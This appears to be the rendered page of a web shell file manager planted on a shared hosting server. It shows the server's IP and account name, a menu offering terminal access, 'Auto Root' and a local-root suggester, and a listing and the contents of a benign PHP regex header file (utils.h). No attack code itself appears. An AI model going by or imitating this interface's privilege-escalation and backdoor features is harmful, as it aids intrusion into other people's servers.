Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.219.23.38
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php52 /
usr /
include /
php /
regex /
Delete
Unzip
Name
Size
Permission
Date
Action
cclass.h
968
B
-rw-r--r--
2025-02-11 14:18
cname.h
2.01
KB
-rw-r--r--
2025-02-11 14:18
regex.h
2
KB
-rw-r--r--
2025-02-11 14:18
regex2.h
5.41
KB
-rw-r--r--
2025-02-11 14:18
regex_extra.h
379
B
-rw-r--r--
2025-02-11 14:18
utils.h
527
B
-rw-r--r--
2025-02-11 14:18
Save
Rename
/* utility definitions */ #include "regex_extra.h" #ifdef _POSIX2_RE_DUP_MAX #define DUPMAX _POSIX2_RE_DUP_MAX #else #define DUPMAX 255 #endif #define INFINITY (DUPMAX + 1) #define NC (CHAR_MAX - CHAR_MIN + 1) typedef unsigned char uch; /* switch off assertions (if not already off) if no REDEBUG */ #ifndef REDEBUG #ifndef NDEBUG #define NDEBUG /* no assertions please */ #endif #endif #include <assert.h> /* for old systems with bcopy() but no memmove() */ #ifdef USEBCOPY #define memmove(d, s, c) bcopy(s, d, c) #endif